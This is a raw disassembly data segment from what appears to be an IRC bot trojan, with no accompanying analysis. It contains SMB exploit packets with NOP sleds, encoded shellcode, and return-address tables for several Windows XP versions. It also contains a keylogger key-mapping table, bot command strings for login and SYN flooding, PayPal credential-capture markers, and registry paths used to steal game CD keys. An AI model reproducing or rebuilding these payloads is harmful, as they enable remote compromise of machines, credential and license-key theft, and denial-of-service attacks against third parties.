dword_440B50 dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: seg000:004108E4�o
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 2 dup(0)
dword_440BC0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: seg000:00410923�o
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_440C68 dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: seg000:00410976�o
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
dd 2 dup(90909090h), 909008EBh, 767A1567h, 909008EBh, 767A1567h
dd 909008EBh, 767A1567h, 909008EBh, 767A1567h, 909008EBh
dd 767A1567h, 909008EBh, 767A1567h, 909008EBh, 767A1567h
dd 909008EBh, 767A1567h, 909008EBh, 767A1567h, 909008EBh
dd 767A1567h, 90909090h, 0EB909090h, 48909008h, 9088444Fh
dd 4 dup(90909090h), 0
dword_440D9C dd 7E0h, 4, 3 dup(0) ; DATA XREF: seg000:004109B3�o
dword_440DB0 dd 0E983C929h, 0D9EED9B0h, 5BF42474h, 19137381h, 833704F5h
; DATA XREF: seg000:004109A0�o
dd 0F4E2FCEBh, 7AEF9FE5h, 0C8FB0CF1h, 5B8F95E6h, 728FD13Dh
dd 32787E25h, 0BCEBF461h, 688FED56h, 7EEFF439h, 368FC192h
dd 0AEC4C4F7h, 43C471B5h, 3ACE341Eh, 0C3EF3718h, 1F20A122h
dd 688F106Ch, 51EFF43Dh, 0BC4FF992h, 0DC05E946h, 0BE8FD91Ah
dd 5618D175h, 53DFC4DAh, 0BC34B692h, 478FF959h, 778F5805h
dd 0B96CAB11h, 67E8FB57h, 646223E6h, 5379D7Fh, 5778271h
dd 0E7FBA146h, 0CBE93E71h, 0E1FBA522h, 51E17C46h, 350C1898h
dd 0C8069F4Ch, 3EDD9DC9h, 0C85358ECh, 6457A6CFh, 6447A64Ah
dd 0E7FBA65Ah
db 7Fh, 9Dh
word_440E6A dw 551Ah ; DATA XREF: seg000:00410994�w
dd 0D68DA67Fh, 2DA09D8Ch, 0C8533269h, 66149FCFh, 5FD40A4Ch
dd 0DE2A58BDh, 64D20A4Eh, 5FD40A4Ch, 7E82BCFCh, 67D20A4Eh
dd 0C851A14Dh, 0D06C66C9h, 607D3360h, 0C85123E6h, 536E93C9h
dd 5A679D7Fh, 676E1090h, 0BEC8DC40h, 0BE409FFEh, 0C4C4C4FBh
dd 1A460BB3h, 0A428B7E7h, 9C3C8F94h, 456C5EB2h, 0C81246E7h
dd 0E1FBB16Ch, 6656A242h, 366EA448h, 6651A448h, 9A6C25E6h
dd 64CAF0C0h, 0C86E23E6h, 0E7FBC2E6h, 0B4F8A292h, 0E1FB91DDh
dd 5FD40A4Bh, 57E43BF6h, 0C8D20A4Ah, 3704F5C9h, 2 dup(0)
dword_440F10 dd 401150FFh, 0 ; DATA XREF: seg000:00410A4C�o
dword_440F18 dd 142FFA1h, 0 ; DATA XREF: seg000:00410A5D�o
dword_440F20 dd 401138FFh, 0 ; DATA XREF: seg000:00410A73�o
dword_440F28 dd 14308B9h, 0 ; DATA XREF: seg000:00410A84�o
dword_440F30 dd 320002h, 90909090h, 0ECC1F631h, 0CE4C10Ch, 0FB89E789h
; DATA XREF: seg000:00410B25�o
dd 748B016Ah, 0D231FE24h, 0E2C14252h, 56575210h
db 0B8h
byte_440F55 db 3 dup(0) ; DATA XREF: seg000:00410A51�o
; seg000:00410A78�o
dd 8E8C100h, 0C08510FFh, 0DC890779h, 75F6854Eh, 90E7FFE1h
dd 3 dup(90909090h)
aRrrrrrrrrrrrrr db '',0
; DATA XREF: seg000:loc_410A89�o
a1_1_1_1_1_1 db '1.1.1.1.1.1',0
aIa db 'ë€',0
align 4
dd 5EB02EBh, 0FFFFF9E8h, 0C08358FFh, 1A08D1Bh, 83FFFFFCh
dd 0EC8BFCE4h, 0B966C933h, 3080020Ch, 0FAE24080h, 80BF6810h
dd 0CE0E8080h, 7EF26C8Eh, 39039633h, 4752F835h, 151CE827h
dd 0EA21EE9Ah, 475358BDh, 0BF086827h, 0F3F71ECAh, 0B2B3DFB2h
dd 7C6D4B80h, 758959BBh, 0F09A242Dh, 0AE2D2447h, 6C96569h
dd 0E4EDE3C9h, 0E4D2DA80h, 80B021E7h, 0B8CC00Bh, 0B2D9CF0h
dd 720B88D8h, 6F017E0Bh, 80808180h, 883149B3h, 80811068h
dd 7FD6D280h, 0BDA60D7h, 87460358h, 853149B3h, 8081FC68h
dd 80036880h, 1E68080h, 0D481106Ch, 808181E8h, 6CD77F80h
dd 40B36C0Bh, 0D0D0D0D0h, 0D0C0D0C0h, 0B70D77Fh, 0C547E658h
dd 0E6808280h, 8082C547h, 84C547D0h, 80808080h, 0D3D590EAh
dd 574D77Fh, 0C062F540h, 0D77FD3D0h, 0D3D0D078h, 0B7CD77Fh
dd 0B340B358h, 0D7913149h, 2B737D0Bh, 80C546DFh, 0BCDD09C4h
dd 9B8DD09h, 47E6C0DDh, 8181ACC5h, 0D0C4C50Dh, 0D1D1D1D5h
dd 0D1C9D1C1h, 7FD1D6D1h, 40B350D7h, 0D77FD0C8h, 0B340B354h
dd 0D7913149h, 2B737D0Bh, 0C4CD0DDFh, 0D0D0D5D1h, 80EA84EAh
dd 0D0D6D0D0h, 150D77Fh, 8084806Ch, 8087E880h, 7FD48081h
dd 0D77FC8F5h, 0E8C0EA58h, 80809080h, 80D080E8h, 7F80EA80h
dd 0D77FC4F5h, 1580B5Ch, 80818043h, 0A41C0980h, 80808038h
dd 34A41C09h, 0B808080h, 8484A40Ch, 0C1478080h, 1010107Bh
dd 7FC14610h, 2690110h, 0EA808081h, 9080E880h, 0D0D18080h
dd 7FC4F57Fh, 7FD460D7h, 0D77FC8F5h, 0C8F57F64h, 0B368D77Fh
dd 7FD0C840h, 0D5D354D7h, 0EC0BD7D6h, 0C50B98A4h, 85D40BBCh
dd 0B5583F8h, 0DA0B98CAh, 635D83A0h, 0B40BC9B9h, 0B375830Bh
dd 40B37C7Fh, 0F444BA2Ch, 1010108Bh, 8D4F4110h, 6E6B7883h
dd 94A4FCBBh, 0DA0B5DF5h, 0E65D83A4h, 0BCB8C0Bh, 5D839CDAh
dd 830B840Bh, 10856B45h, 40B31010h, 0DEDF550Bh, 8442DBDDh
dd 7FD3D180h, 7F1868B6h, 2D2B7F7Fh, 7162D9DBh, 43h, 4Fh
dd 4Eh, 41h, 42h, 41h, 43h, 41h, 0C1h, 41h, 0C3h, 41h
dd 0C9h, 41h, 0CAh, 41h, 0CBh, 41h, 0CCh, 41h, 0CDh, 41h
dd 0CEh, 41h, 0CFh, 41h, 0D0h
aFb db 'fìÐ',7,0 ; DATA XREF: seg000:00410FCE�o
align 4
dword_441258 dd 129F74h, 0 ; DATA XREF: seg000:00411234�o
dword_441260 dd 127D78h, 0 ; DATA XREF: seg000:00411294�o
dword_441268 dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 3D137381h, 836F5088h
; DATA XREF: seg000:00410FFB�o
dd 0F4E2FCEBh, 22BBE2C1h, 90AF71D5h, 3DBE8C2h, 2ADBAC19h
dd 6A2C0301h, 0E4BF8945h, 30DB9072h, 26BB891Dh, 6EDBBCB6h
dd 0F690B9D3h, 1B900C91h, 629A493Ah, 9BBB4A3Ch, 4774DC06h
dd 30DB6D48h, 9BB8919h, 0E41B84B6h, 84519462h, 0E6DBA43Eh
dd 0E4CAC51h, 0B8BB9FEh, 0E460CBB6h, 1FDB847Dh, 2FDB2521h
dd 0E138D635h, 3FBC8673h, 3C365EC2h, 5D63E05Bh, 5D23FF55h
dd 0BFAFDC62h, 93BD4355h, 0B9AFD806h, 9B50162h, 6D5865BCh
dd 9052E268h, 6689E0EDh, 900725C8h, 3C03DBEBh, 3C13DB6Eh
dd 0BFAFDB7Eh, 0A857E05Bh, 8ED9DB5Bh, 75F4E0A8h, 90074F4Dh
dd 3E40E2EBh, 7807768h, 867E2599h, 3C86776Ah, 7807768h
dd 26D6C1D8h, 3F86776Ah, 9005DC69h, 88381BEDh, 38294E44h
dd 90055EC2h, 0B3AEEEDh, 233E05Bh, 3F3A6DB4h, 0E69CA164h
dd 0E614E2DAh, 9C90B9DFh, 42127697h, 0FC7CCAC3h, 0C468F2B0h
dd 1D382396h, 90463BC3h, 0B9AFCC48h, 3E02DF66h, 6E3AD96Ch
dd 3E05D96Ch, 0C23858C2h, 3C9E8DE4h, 903A5EC2h, 0BFAFBFC2h
dd 0ECACDFB6h, 0B9AFECF9h, 780776Fh, 305402CDh, 9086776Eh
dd 6F5088EDh, 2 dup(0)
dword_4413C8 dd 5B03EB60h, 0F8E8C353h, 31FFFFFFh, 13404C0h, 315B50D8h
; DATA XREF: seg000:00410FE1�o
dd 401002D2h, 50403002h, 4104C031h, 0C628C228h, 6604E2C0h
dd 3104EAC1h, 2F630C0h, 66032803h, 58431301h, 802C931h
dd 61D5E0h, 433D94h
dword_44140C dd 77BD3143h ; DATA XREF: seg000:00410FB9�r
dword_441410 dd 7FCh ; DATA XREF: seg000:00410FB3�r
byte_441414 db 1 ; DATA XREF: seg000:004111D3�r
; seg000:004111FA�r ...
align 4
dd offset aWindowsXpSp01E ; "Windows XP SP0+1 ENG"
dd 77C03143h, 7FCh, 1, 433D68h, 77BD1F89h, 7FCh, 1, 433D54h
dd 77BD1FA8h, 7FCh, 1, 433D40h, 77BD1FD6h, 7FCh, 1, 433D2Ch
dd 77BD2195h, 7FCh, 1, 433D18h, 77BD21B3h, 7FCh, 1, 433D04h
dd 77BD21E0h, 7FCh, 1, 433CF0h, 77BD220Ch, 7FCh, 1, 433CDCh
dd 77BD2241h, 7FCh, 1, 433CC8h, 77BD22D2h, 7FCh, 1, 433CB4h
dd 77BD28B2h, 7FCh, 1, 433CA0h, 77BD29ABh, 7FCh, 1, 433C8Ch
dd 77BD29E7h, 7FCh, 1, 433C78h, 77BD29F7h, 7FCh, 1, 433C64h
dd 77BD2A03h, 7FCh, 1, 433C50h, 77BD2D6Dh, 7FCh, 1, 433C3Ch
dd 77BD2DB3h, 7FCh, 1, 433C28h, 77BD2EC2h, 7FCh, 1, 433C14h
dd 77BD2EDDh, 7FCh, 1, 433C00h, 77BD30AFh, 7FCh, 1, 433BECh
dd 77BD312Bh, 7FCh, 1, 433BD8h, 77BD3160h, 7FCh, 1, 433BC4h
dd 77BD349Ah, 7FCh, 1, 433BB0h, 77BD34E4h, 7FCh, 1, 433B94h
dd 655B4F02h, 7E7h, 0
dd offset aWindowsUkXp_23 ; "Windows uk xp pro sp1 1"
dd 77C01F89h, 7FCh, 1, 433B64h, 77C01FA8h, 7FCh, 1, 433B4Ch
dd 77C01FD6h, 7FCh, 1, 433B34h, 77C02195h, 7FCh, 1, 433B1Ch
dd 77C021B3h, 7FCh, 1, 433B04h, 77C021E0h, 7FCh, 1, 433AECh
dd 77C0220Ch, 7FCh, 1, 433AD4h, 77C02241h, 7FCh, 1, 433ABCh
dd 77C022D2h, 7FCh, 1, 433AA0h, 77C028B2h, 7FCh, 1, 433A84h
dd 77C029ABh, 7FCh, 1, 433A68h, 77C029E7h, 7FCh, 1, 433A4Ch
dd 77C029F7h, 7FCh, 1, 433A30h, 77C02A03h, 7FCh, 1, 433A14h
dd 77C02A39h, 7FCh, 1, 4339F8h, 77C02D6Dh, 7FCh, 1, 4339DCh
dd 77C02DB3h, 7FCh, 1, 4339C0h, 77C02EC2h, 7FCh, 1, 4339A4h
dd 77C02EDDh, 7FCh, 1, 433988h, 77C030AFh, 7FCh, 1, 43396Ch
dd 77C0312Bh, 7FCh, 1, 433950h, 77C03143h, 7FCh, 1, 433934h
dd 77C03160h, 7FCh, 1, 433918h, 77C0349Ah, 7FCh, 1, 4338FCh
dd 77C034E4h, 7FCh, 1, 4338E4h, 77B920FDh, 7FCh, 1, 4338CCh
dd 77B9211Ch, 7FCh, 1, 4338B4h, 77B9214Ah, 7FCh, 1, 43389Ch
dd 77B9230Ch, 7FCh, 1, 433884h, 77B9232Ah, 7FCh, 1, 43386Ch
dd 77B92357h, 7FCh, 1, 433854h, 77B92383h, 7FCh, 1, 43383Ch
dd 77B923B8h, 7FCh, 1, 433824h, 77B92448h, 7FCh, 1, 433808h
dd 77B92AAAh, 7FCh, 1, 4337ECh, 77B92BA7h, 7FCh, 1, 4337D0h
dd 77B92BE3h, 7FCh, 1, 4337B4h, 77B92BF3h, 7FCh, 1, 433798h
dd 77B92BFFh, 7FCh, 1, 43377Ch, 77B92F78h, 7FCh, 1, 433760h
dd 77B92FBEh, 7FCh, 1, 433744h, 77B930EFh, 7FCh, 1, 433728h
dd 77B9310Dh, 7FCh, 1, 43370Ch, 77B9330Ch, 7FCh, 1, 4336F0h
dd 77B93388h, 7FCh, 1, 4336D4h, 77B9339Eh, 7FCh, 1, 4336B8h
dd 77B933BAh, 7FCh, 1, 43369Ch, 77B9373Dh, 7FCh, 1, 433680h
dd 77B9378Ah, 7FCh, 1, 433668h, 77B920FDh, 7FCh, 1, 433650h
dd 77B9211Ch, 7FCh, 1, 433638h, 77B9214Ah, 7FCh, 1, 433620h
dd 77B9230Ch, 7FCh, 1, 433608h, 77B9232Ah, 7FCh, 1, 4335F0h
dd 77B92357h, 7FCh, 1, 4335D8h, 77B92383h, 7FCh, 1, 4335C0h
dd 77B923B8h, 7FCh, 1, 4335A8h, 77B92448h, 7FCh, 1, 43358Ch
dd 77B92AAAh, 7FCh, 1, 433570h, 77B92BA7h, 7FCh, 1, 433554h
dd 77B92BE3h, 7FCh, 1, 433538h, 77B92BF3h, 7FCh, 1, 43351Ch
dd 77B92BFFh, 7FCh, 1, 433500h, 77B92F78h, 7FCh, 1, 4334E4h
dd 77B92FBEh, 7FCh, 1, 4334C8h, 77B930EFh, 7FCh, 1, 4334ACh
dd 77B9310Dh, 7FCh, 1, 433490h, 77B9330Ch, 7FCh, 1, 433474h
dd 77B93388h, 7FCh, 1, 433458h, 77B9339Eh, 7FCh, 1, 43343Ch
dd 77B933BAh, 7FCh, 1, 433420h, 77B9373Dh, 7FCh, 1, 433404h
dd 77B9378Ah, 7FCh, 1, 4333F8h, 41414141h, 7FCh, 1, 4333E0h
dd 77E14C29h, 7FCh, 1, 4333C8h, 77E3CB4Ch, 7FCh, 1, 4333B0h
dd 77E42C75h, 7FCh, 1, 433398h, 77E3C256h, 7FCh, 1, 433380h
dd 77E2AFC5h, 7FCh, 1, 433368h, 77E2492Bh, 7FCh, 1, 433350h
dd 77E4FF15h, 7FCh, 1, 433338h, 77E33F4Dh, 7FCh, 1, 8
dd 62h, 62000000h, 2 dup(0)
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h, 38h, 38000000h, 2 dup(0)
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 3 dup(0)
dd offset dword_435158
dd offset off_435154
dd offset aFtp ; "FTP"
dd offset aHttp_0 ; "HTTP"
a_login_1 db ':.login',0
dd 4 dup(0)
aLogin_2 db ':,login',0
dd 4 dup(0)
aLogin_3 db ':!login',0
dd 4 dup(0)
a@login db ':@login',0
dd 4 dup(0)
aLogin_4 db ':$login',0
dd 4 dup(0)
aLogin_5 db ':%login',0
dd 4 dup(0)
aLogin_6 db ':^login',0
dd 4 dup(0)
aLogin_7 db ':&login',0
dd 4 dup(0)
aLogin_8 db ':*login',0
dd 4 dup(0)
aLogin_9 db ':-login',0
dd 4 dup(0)
aLogin_10 db ':+login',0
dd 4 dup(0)
aLogin_11 db ':/login',0
dd 4 dup(0)
aLogin_12 db ':\login',0
dd 4 dup(0)
aLogin_13 db ':=login',0
dd 4 dup(0)
a?login db ':?login',0
dd 4 dup(0)
aLogin_14 db ':',27h,'login',0
dd 4 dup(0)
aLogin_15 db ':`login',0
dd 4 dup(0)
aLogin_16 db ':~login',0
dd 4 dup(0)
aLogin_17 db ': login',0
dd 4 dup(0)
a_auth db ':.auth',0
align 4
dd 4 dup(0)
aAuth db ':,auth',0
align 10h
dd 4 dup(0)
aAuth_0 db ':!auth',0
align 4
dd 4 dup(0)
a@auth db ':@auth',0
align 10h
dd 4 dup(0)
aAuth_1 db ':$auth',0
align 4
dd 4 dup(0)
aAuth_2 db ':%auth',0
align 10h
dd 4 dup(0)
aAuth_3 db ':^auth',0
align 4
dd 4 dup(0)
aAuth_4 db ':&auth',0
align 10h
dd 4 dup(0)
aAuth_5 db ':*auth',0
align 4
dd 4 dup(0)
aAuth_6 db ':-auth',0
align 10h
dd 4 dup(0)
aAuth_7 db ':+auth',0
align 4
dd 4 dup(0)
aAuth_8 db ':/auth',0
align 10h
dd 4 dup(0)
aAuth_9 db ':\auth',0
align 4
dd 4 dup(0)
aAuth_10 db ':=auth',0
align 10h
dd 4 dup(0)
a?auth db ':?auth',0
align 4
dd 4 dup(0)
aAuth_11 db ':',27h,'auth',0
align 10h
dd 4 dup(0)
aAuth_12 db ':`auth',0
align 4
dd 4 dup(0)
aAuth_13 db ':~auth',0
align 10h
dd 4 dup(0)
aAuth_14 db ': auth',0
align 4
dd 4 dup(0)
a_id db ':.id',0
align 10h
dd 4 dup(0)
aId_0 db ':,id',0
align 4
dd 4 dup(0)
aId_1 db ':!id',0
align 10h
dd 4 dup(0)
a@id db ':@id',0
align 4
dd 4 dup(0)
aId_2 db ':$id',0
align 10h
dd 4 dup(0)
aId_3 db ':%id',0
align 4
dd 4 dup(0)
aId_4 db ':^id',0
align 10h
dd 4 dup(0)
aId_5 db ':&id',0
align 4
dd 4 dup(0)
aId_6 db ':*id',0
align 10h
dd 4 dup(0)
aId_7 db ':-id',0
align 4
dd 4 dup(0)
aId_8 db ':+id',0
align 10h
dd 4 dup(0)
aId_9 db ':/id',0
align 4
dd 4 dup(0)
aId_10 db ':\id',0
align 10h
dd 4 dup(0)
aId_11 db ':=id',0
align 4
dd 4 dup(0)
a?id db ':?id',0
align 10h
dd 4 dup(0)
aId_12 db ':',27h,'id',0
align 4
dd 4 dup(0)
aId_13 db ':`id',0
align 10h
dd 4 dup(0)
aId_14 db ':~id',0
align 4
dd 4 dup(0)
aId_15 db ': id',0
align 10h
dd 4 dup(0)
a_hashin_0 db ':.hashin',0
align 4
dd 3 dup(0)
aHashin_0 db ':!hashin',0
align 10h
aHashin_1 db ':$hashin',0
align 4
dd 3 dup(0)
aHashin_2 db ':%hashin',0
align 10h
a_secure db ':.secure',0
align 4
dd 3 dup(0)
aSecure_1 db ':!secure',0
align 10h
a_l db ':.l',0
dd 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
a_syn db ':.syn',0
align 4
dd 4 dup(0)
aSyn_0 db ':!syn',0
align 10h
dd 4 dup(0)
aSyn_1 db ':$syn',0
align 4
dd 4 dup(0)
aSyn_2 db ':%syn',0
align 10h
dd 4 dup(0)
aCdkey_0 db ' CDKey ',0
dd 4 dup(0)
aJoin_1 db 'JOIN #',0
align 10h
dd 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
dd 80000001h
off_442AA4 dd offset aSoftwareValveC ; DATA XREF: sub_4185EA+C�r
; sub_4185EA+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_442AB0 dd 2 dup(0) ; DATA XREF: sub_4185EA+26�o
dd 80000001h, 4369A8h, 43699Ch, 43698Ch, 2 dup(0)
dd 80000001h, 43696Ch, 436968h, 436954h, 2 dup(0)
dd 80000001h, 436930h, 436968h, 436924h, 2 dup(0)
dd 80000001h, 436900h, 4368F8h, 4368E4h, 2 dup(0)
dd 80000001h, 4368D0h, 4368C0h, 4368A4h, 2 dup(0)
dd 80000001h, 436860h, 4369E8h, 43684Ch, 2 dup(0)
dd 80000002h, 436820h, 436814h, 4367F4h, 2 dup(0)
dd 80000002h, 4367C0h, 4369E8h, 4367A8h, 2 dup(0)
dd 80000002h, 436774h, 4369E8h, 43675Ch, 2 dup(0)
dd 80000002h, 436744h, 4369E8h, 43672Ch, 2 dup(0)
dd 80000002h, 4366F0h, 42B633h, 4366E0h, 2 dup(0)
dd 80000002h, 4366A8h, 42B633h, 436694h, 2 dup(0)
dd 80000002h, 436648h, 42B633h, 436628h, 2 dup(0)
dd 80000002h, 4365D8h, 42B633h, 4365A8h, 2 dup(0)
dd 80000002h, 43656Ch, 42B633h, 436558h, 2 dup(0)
dd 80000002h, 436520h, 42B633h, 436510h, 2 dup(0)
dd 80000002h, 4364C0h, 42B633h, 436490h, 2 dup(0)
dd 80000002h, 436450h, 42B633h, 436430h, 2 dup(0)
dd 80000002h, 436400h, 42B633h, 4363E0h, 2 dup(0)
dd 80000002h, 4363A4h, 42B633h, 436390h, 2 dup(0)
dd 80000002h, 436348h, 42B633h, 436324h, 2 dup(0)
dd 80000002h, 4362D0h, 42B633h, 4362A0h, 2 dup(0)
dd 80000002h, 436250h, 42B633h, 436224h, 2 dup(0)
dd 80000002h, 4361E4h, 4361DCh, 4361BCh, 2 dup(0)
dd 80000002h, 436178h, 42B633h, 43615Ch, 2 dup(0)
dd 80000002h, 436110h, 42B633h, 4360ECh, 2 dup(0)
dd 80000002h, 4360B8h, 42B633h, 4360ACh, 2 dup(0)
dd 80000002h, 436078h, 42B633h, 43606Ch, 2 dup(0)
dd 80000002h, 436038h, 42B633h, 43602Ch, 2 dup(0)
dd 80000002h, 435FF8h, 42B633h, 435FECh, 2 dup(0)
dd 80000002h, 435FB0h, 42B633h, 435F9Ch, 2 dup(0)
dd 80000002h, 435F60h, 42B633h, 435F4Ch, 2 dup(0)
dd 80000002h, 435F1Ch, 4369E8h, 435F00h, 2 dup(0)
dd 80000002h, 435EE0h, 435ED8h, 435EB4h, 2 dup(0)
dd 80000002h, 435E98h, 435ED8h, 435E78h, 2 dup(0)
dd 80000002h, 435E58h, 435ED8h, 435E34h, 2 dup(0)
dd 80000002h, 435E1Ch, 435ED8h, 435E18h, 2 dup(0)
dd 80000002h, 435DFCh, 435DECh, 435DE4h, 2 dup(0)
dd 80000002h, 435DB0h, 42F4DCh, 435D98h, 2 dup(0)
dd 80000002h, 435D5Ch, 435D50h, 435D28h, 435D18h, 435D04h
dd 80000002h, 435CE0h, 435CD4h, 435CC0h, 435CB0h, 435CA8h
dd 80000002h, 435CE0h, 435CD4h, 435C7Ch, 435CB0h, 435C74h
dd 80000002h, 435CE0h, 435CD4h, 435C44h, 435CB0h, 435C3Ch
dd 6 dup(0)
off_442ED8 dd offset aQ ; DATA XREF: sub_41A293+5C�r
; "q"
dd offset aW_0 ; "w"
dd offset aE ; "e"
dd offset aR ; "r"
dd offset aT ; "t"
dd offset aY_0 ; "y"
dd offset aU ; "u"
dd offset aI ; "i"
dd offset aP ; "p"
